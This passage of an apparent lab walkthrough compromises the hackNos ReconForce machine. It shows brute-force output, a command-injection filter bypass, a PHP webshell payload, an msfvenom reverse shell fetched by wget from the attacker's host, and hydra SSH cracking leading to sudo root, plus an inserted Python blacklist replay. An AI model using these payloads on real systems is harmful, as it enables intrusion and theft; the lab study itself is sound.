class="line"> SSL false no Negotiate SSL/TLS for outgoing connections</span><br><span class="line"> STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host</span><br><span class="line"> THREADS 1 yes The number of concurrent threads (max one per host)</span><br><span class="line"> 
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_userpass.txt no File containing users and passwords separated by space, one pair per line</span><br><span class="line"> USER_AS_PASS false no Try the username as the password for all users</span><br><span class="line"> USER_FILE /usr/share/metasploit-framework/data/wordlists/http_default_users.txt no File containing users, one per line</span><br><span class="line"> VERBOSE true yes Whether to print output for all attempts</span><br><span class="line"> VHOST no HTTP server virtual host</span><br><span class="line"></span><br><span class="line">msf6 auxiliary(scanner/http/http_login) > set pass_file /root/cve/passrecon</span><br><span class="line">pass_file => /root/cve/passrecon</span><br><span class="line">msf6 auxiliary(scanner/http/http_login) > set auth_uri /5ecure/</span><br><span class="line">auth_uri => /5ecure/</span><br><span class="line">msf6 auxiliary(scanner/http/http_login) > set rhosts 192.168.5.132</span><br><span class="line">rhosts => 192.168.5.132</span><br><span class="line">msf6 auxiliary(scanner/http/http_login) > exploit </span><br><span class="line"></span><br><span class="line">[*] Attempting to login to http://192.168.5.132:80/5ecure/</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'admin:Security@h'</span><br><span class="line">[!] 
No active DB -- Credential data will not be saved!</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'admin:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'admin:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'admin:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'admin:aaaa'</span><br><span class="line">[+] 192.168.5.132:80 - Success: 'admin:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'manager:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'manager:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'manager:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'manager:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'manager:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'manager:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'root:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'root:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'root:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'root:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'root:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'root:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'apc:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'apc:admin'</span><br><span class="line">[-] 
192.168.5.132:80 - Failed: 'apc:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'apc:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'apc:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'apc:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'pass:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'pass:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'pass:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'pass:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'pass:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'pass:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'security:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'security:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'security:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'security:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'security:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'security:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'user:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'user:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'user:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'user:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'user:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'user:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'system:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'system:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'system:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'system:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - 
Failed: 'system:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'system:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'sys:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'sys:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'sys:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'sys:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'sys:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'sys:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'wampp:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'wampp:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'wampp:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'wampp:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'wampp:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'wampp:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'newuser:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'newuser:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'newuser:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'newuser:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'newuser:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'newuser:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'xampp-dav-unsecure:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'xampp-dav-unsecure:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'xampp-dav-unsecure:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'xampp-dav-unsecure:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'xampp-dav-unsecure:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 
'xampp-dav-unsecure:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'vagrant:Security@h'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'vagrant:admin'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'vagrant:asdf'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'vagrant:qwer'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'vagrant:aaaa'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'vagrant:Security@hackNos'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'connect:connect'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'sitecom:sitecom'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:cisco'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'cisco:sanfran'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'private:private'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'wampp:xampp'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'newuser:wampp'</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'xampp-dav-unsecure:ppmax2011 '</span><br><span class="line">[-] 192.168.5.132:80 - Failed: 'vagrant:vagrant'</span><br><span class="line">[*] Scanned 1 of 1 hosts (100% complete)</span><br><span class="line">[*] Auxiliary module execution completed</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>The brute force yields <code>[+] 192.168.5.132:80 - Success: 'admin:Security@hackNos'</code></p><p>After logging in, the page turns out to offer command execution</p><p><img src="/2023/10/21/ReconForce/image-20230628231041967.png" alt="image-20230628231041967"></p><p><img src="/2023/10/21/ReconForce/image-20230628231103439.png" alt="image-20230628231103439"></p><p>Send a command through Burp Suite to read the source of out.php:</p><p><img src="/2023/10/21/ReconForce/image-20230628231119740.png" alt="image-20230628231119740"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line"></span><br><span class="line">if( isset( $_POST[ 'Submit' ] ) ) {</span><br><span class="line"> // Get input</span><br><span class="line"> $target = trim($_REQUEST[ 'ip' ]);</span><br><span class="line"></span><br><span class="line"> // Set blacklist</span><br><span class="line"> $substitutions = array(</span><br><span class="line"> '&' => '',</span><br><span class="line"> ';' => '',</span><br><span class="line"> '| ' => '',</span><br><span class="line"> '-' => '',</span><br><span class="line"> '$' => '',</span><br><span class="line"> '(' => '',</span><br><span class="line"> ')' => '',</span><br><span class="line"> '`' => '',</span><br><span class="line"> '||' => '',</span><br><span class="line"> );</span><br><span class="line"></span><br><span class="line"> // Remove any of the charactars in 
the array (blacklist).</span><br><span class="line"> $target = str_replace( array_keys( $substitutions ), $substitutions, $target );</span><br><span class="line"></span><br><span class="line"> // Determine OS and execute the ping command.</span><br><span class="line"> if( stristr( php_uname( 's' ), 'Windows NT' ) ) {</span><br><span class="line"> // Windows</span><br><span class="line"> $cmd = shell_exec( 'ping ' . $target );</span><br><span class="line"> }</span><br><span class="line"> else {</span><br><span class="line"> // *nix</span><br><span class="line"> $cmd = shell_exec( 'ping -c 4 ' . $target );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> // Feedback for the end user</span><br><span class="line"> echo "<pre>{$cmd}</pre>";</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">?> </span><br></pre></td></tr></table></figure><p>The bug is in how the blacklist array was written: it strips the two-character sequence pipe-plus-space, never the pipe on its own.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$substitutions = array(</span><br><span class="line"> '&' => '',</span><br><span class="line"> ';' => '',</span><br><span class="line"> '| ' => '',// this entry is | followed by a space, not a bare |</span><br><span class="line"> '-' => '',</span><br><span class="line"> '$' => '',</span><br><span class="line"> '(' => '',</span><br><span class="line"> ')' => '',</span><br><span class="line"> '`' => '',</span><br><span class="line"> '||' => '',// never matches: "a || b" has already become "a |b" at the '| ' step</span><br><span class="line">);</span><br></pre></td></tr></table></figure><p>That is, <code>127.0.0.1| 
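id</code> has its pipe stripped and becomes <code>127.0.0.1id</code>, a harmless ping target, but nothing in the list matches a pipe that is directly followed by the next command. As an added example that is not part of this writeup, the Python below replays the out.php blacklist exactly (PHP's <code>str_replace()</code> with array arguments applies the pairs one after another, in the order listed), runs several inputs through it, and adds the check the page never shows: an allowlist that accepts only a literal IP address. The blacklist and the one-liner payload are copied from this page; the function names, the sample inputs and the <code>validate_target()</code> helper are my own.</p>

```python
"""Replay of the out.php blacklist (added example, not code from the writeup).

PHP's str_replace() with array arguments applies each search/replace pair in
the order given, over the whole string, so the ORDER of the blacklist matters
and a bare "|" is never touched: only "| " (pipe followed by a space) is.
"""
import ipaddress
import re

# The blacklist exactly as it appears in out.php: same entries, same order.
BLACKLIST = [
    ("&", ""),
    (";", ""),
    ("| ", ""),   # pipe followed by a space; "|" on its own survives
    ("-", ""),    # also kills command flags: "ls -la" becomes "ls la"
    ("$", ""),    # also kills "$_POST" inside a PHP one-liner
    ("(", ""),
    (")", ""),
    ("`", ""),
    ("||", ""),   # dead rule: "a || b" became "a |b" at the "| " step already
]

# Metacharacters the blacklist never removes; each one is enough to run a
# second command or redirect output when appended to the ping target.
SURVIVING_METACHARS = re.compile(r"[|\n<>]")

# The one-liner payload from this page, used below to show what survives.
ONE_LINER = """127.0.0.1|echo "<?php @eval($_POST['qwer']);?>" >> php.php"""


def php_filter(target: str) -> str:
    """Reproduce str_replace(array_keys($substitutions), $substitutions, $target)."""
    for needle, replacement in BLACKLIST:
        target = target.replace(needle, replacement)
    return target


def shell_command(target: str) -> str:
    """The string out.php hands to shell_exec() on *nix after filtering."""
    return "ping -c 4 " + php_filter(target)


def is_injectable(target: str) -> bool:
    """True if a command-chaining metacharacter survives the blacklist."""
    return SURVIVING_METACHARS.search(php_filter(target)) is not None


def validate_target(target: str) -> bool:
    """Hardened replacement for the blacklist (hypothetical helper, not from
    the page): allowlist a literal IPv4/IPv6 address and reject everything
    else instead of trying to strip bad characters out of free text."""
    try:
        ipaddress.ip_address(target.strip())
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    samples = [
        "127.0.0.1| id",    # what the blacklist was written to stop
        "127.0.0.1|id",     # the bypass used on this page
        "127.0.0.1 || id",  # the "||" rule never fires
        "127.0.0.1\nid",    # a newline is not in the list either
        ONE_LINER,          # what actually reaches the disk
    ]
    for sample in samples:
        print(f"{sample!r:60} -> {shell_command(sample)!r}  "
              f"injectable={is_injectable(sample)} allowlisted={validate_target(sample)}")
```

<p>Running it prints, for each sample, the exact string that <code>shell_exec()</code> receives: the pipe-space form is neutralised, the bare pipe, the <code>||</code> form and a newline all get through, and the one-liner arrives with its <code>$</code>, <code>(</code>, <code>)</code> and <code>;</code> removed. The page's own comparison, once more: <code>127.0.0.1| 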
id</code> is blocked, while <code>127.0.0.1|id</code> is not.</p><p>So a bare <code>|</code> with no space after it bypasses the filter.</p><p>Try writing a one-line webshell directly: <code>127.0.0.1|echo "<?php @eval($_POST['qwer']);?>" >> php.php</code></p><p><img src="/2023/10/21/ReconForce/image-20230628231150995.png" alt="image-20230628231150995"></p><p>Webshell clients such as Caidao and AntSword could not connect to it. That is expected: the same blacklist also strips <code>$</code>, <code>(</code>, <code>)</code> and <code>;</code>, so what lands in php.php is <code><?php @eval_POST['qwer']?></code>, which never calls eval().</p><h3 id="使用msf生成后门反弹shell"><a href="#使用msf生成后门反弹shell" class="headerlink" title="Generate a reverse-shell backdoor with msfvenom"></a>Generate a reverse-shell backdoor with msfvenom</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=1234 R > pwn1234.php</span><br></pre></td></tr></table></figure><p>Fetch the backdoor onto the target with wget through the same injection point (no wget flags, since the blacklist strips <code>-</code>):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip=127.0.0.1|wget http://192.168.56.102/shell.php&Submit=Ping_Scan</span><br></pre></td></tr></table></figure><p>Start a handler in msf and open pwn1234.php in the browser to get a meterpreter shell:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">msf6 > use exploit/multi/handler </span><br><span class="line">[*] Using configured payload generic/shell_reverse_tcp</span><br><span class="line">msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp</span><br><span class="line">payload => php/meterpreter/reverse_tcp</span><br><span class="line">msf6 exploit(multi/handler) > set lhost 0.0.0.0</span><br><span 
class="line">lhost => 0.0.0.0</span><br><span class="line">msf6 exploit(multi/handler) > set lport 1234</span><br><span class="line">lport => 1234</span><br><span class="line">msf6 exploit(multi/handler) > exploit </span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 0.0.0.0:1234 </span><br><span class="line">[*] Sending stage (39282 bytes) to 192.168.5.132</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.5.129:1234 -> 192.168.5.132:51424) at 2021-09-17 15:11:04 +0800</span><br><span class="line">meterpreter > </span><br></pre></td></tr></table></figure><p>Drop into a system shell and upgrade it to a PTY with python3:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">meterpreter > shell</span><br><span class="line">Process 3357 created.</span><br><span class="line">Channel 0 created.</span><br><span class="line">python3 -c 'import pty;pty.spawn("/bin/bash")'</span><br><span class="line">www-data@hacknos:/var/www/recon/5ecure$</span><br></pre></td></tr></table></figure><p>Read user.txt:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">www-data@hacknos:/var/www$ cat /home/recon/user.txt</span><br><span class="line">cat /home/recon/user.txt</span><br><span class="line">###########################################</span><br><span class="line"></span><br><span class="line">MD5HASH: bae11ce4f67af91fa58576c1da2aad4b</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Dump /etc/passwd:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">www-data@hacknos:/var/www/recon/5ecure$ cat /etc/passwd</span><br><span class="line">cat /etc/passwd</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line">sync:x:4:65534:sync:/bin:/bin/sync</span><br><span class="line">games:x:5:60:games:/usr/games:/usr/sbin/nologin</span><br><span class="line">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span><br><span class="line">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span><br><span 
class="line">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span><br><span class="line">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span><br><span class="line">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span><br><span class="line">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span><br><span class="line">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span><br><span class="line">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span><br><span class="line">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span><br><span class="line">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span><br><span class="line">systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">messagebus:x:103:106::/nonexistent:/usr/sbin/nologin</span><br><span class="line">syslog:x:104:110::/home/syslog:/usr/sbin/nologin</span><br><span class="line">_apt:x:105:65534::/nonexistent:/usr/sbin/nologin</span><br><span class="line">uuidd:x:106:111::/run/uuidd:/usr/sbin/nologin</span><br><span class="line">tcpdump:x:107:112::/nonexistent:/usr/sbin/nologin</span><br><span class="line">landscape:x:108:114::/var/lib/landscape:/usr/sbin/nologin</span><br><span class="line">pollinate:x:109:1::/var/cache/pollinate:/bin/false</span><br><span class="line">sshd:x:110:65534::/run/sshd:/usr/sbin/nologin</span><br><span class="line">systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin</span><br><span class="line">recon:x:1000:119:rahul:/home/recon:/bin/bash</span><br><span 
class="line">lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false</span><br><span class="line">ftp:x:111:117:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin</span><br><span class="line">mysql:x:112:118:MySQL Server,,,:/nonexistent:/bin/false</span><br><span class="line">dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Apart from root, the only account with an interactive shell is <code>recon</code> (UID 1000, <code>/bin/bash</code>).</p><h3 id="使用hydra爆破ssh口令(这里只是想用一下hydra,密码字典还是passrecon)"><a href="#使用hydra爆破ssh口令(这里只是想用一下hydra,密码字典还是passrecon)" class="headerlink" title="Brute-force the SSH password with hydra (just to try hydra out; the wordlist is still passrecon)"></a>Brute-force the SSH password with hydra (just to try hydra out; the wordlist is still passrecon)</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">└─# cat passrecon </span><br><span class="line">Security@h</span><br><span class="line">admin</span><br><span class="line">asdf</span><br><span class="line">qwer</span><br><span class="line">aaaa</span><br><span class="line">Security@hackNos</span><br><span class="line"></span><br><span class="line">└─# hydra -l recon -P passrecon ssh://192.168.5.132 </span><br><span class="line">Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).</span><br><span 
class="line"></span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-17 22:07:52</span><br><span class="line">[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4</span><br><span class="line">[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), ~1 try per task</span><br><span class="line">[DATA] attacking ssh://192.168.5.132:22/</span><br><span class="line">[22][ssh] host: 192.168.5.132 login: recon password: Security@hackNos</span><br><span class="line">1 of 1 target successfully completed, 1 valid password found</span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-17 22:07:55</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>This gives the password <code>Security@hackNos</code>, the same credential that already worked for the web login.</p><p>Log in as <code>recon</code> over SSH and check its sudo rights: with its own password it may run any command as any user.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span 
class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">└─# ssh recon@192.168.5.132 </span><br><span class="line">The authenticity of host '192.168.5.132 (192.168.5.132)' can't be established.</span><br><span class="line">ECDSA key fingerprint is SHA256:YyrsJ6SfcrEjupojYvAzzhetfPVnVVv4XDFAoaf2FGw.</span><br><span class="line">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes</span><br><span class="line">Warning: Permanently added '192.168.5.132' (ECDSA) to the list of known hosts.</span><br><span class="line">recon@192.168.5.132's password: </span><br><span class="line">Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-24-generic x86_64)</span><br><span class="line"></span><br><span class="line"> * Documentation: https://help.ubuntu.com</span><br><span class="line"> * Management: https://landscape.canonical.com</span><br><span class="line"> * Support: https://ubuntu.com/advantage</span><br><span class="line"></span><br><span class="line"> System information as of Fri 17 Sep 2021 02:09:16 PM UTC</span><br><span class="line"></span><br><span class="line"> System load: 0.05 Processes: 154</span><br><span class="line"> Usage of /: 35.3% of 9.22GB Users logged in: 0</span><br><span class="line"> Memory usage: 11% IP address for ens33: 192.168.5.132</span><br><span class="line"> Swap usage: 0%</span><br><span class="line"></span><br><span class="line"> * Super-optimized for small spaces - read how we shrank the memory</span><br><span class="line"> footprint of MicroK8s to make it the smallest full K8s around.</span><br><span 
class="line"></span><br><span class="line"> https://ubuntu.com/blog/microk8s-memory-optimisation</span><br><span class="line"></span><br><span class="line">31 updates can be installed immediately.</span><br><span class="line">0 of these updates are security updates.</span><br><span class="line">To see these additional updates run: apt list --upgradable</span><br><span class="line"></span><br><span class="line">Your Ubuntu release is not supported anymore.</span><br><span class="line">For upgrade information, please visit:</span><br><span class="line">http://www.ubuntu.com/releaseendoflife</span><br><span class="line"></span><br><span class="line">New release '20.04.3 LTS' available.</span><br><span class="line">Run 'do-release-upgrade' to upgrade to it.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Last login: Fri Jan 10 23:05:02 2020 from 192.168.0.104</span><br><span class="line">recon@hacknos:~$ sudo -l</span><br><span class="line">[sudo] password for recon: </span><br><span class="line">Matching Defaults entries for recon on hacknos:</span><br><span class="line"> env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin</span><br><span class="line"></span><br><span class="line">User recon may run the following commands on hacknos:</span><br><span class="line"> (ALL : ALL) ALL</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="直接切换用户到root"><a href="#直接切换用户到root" class="headerlink" title="Switch straight to root"></a>Switch straight to root</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
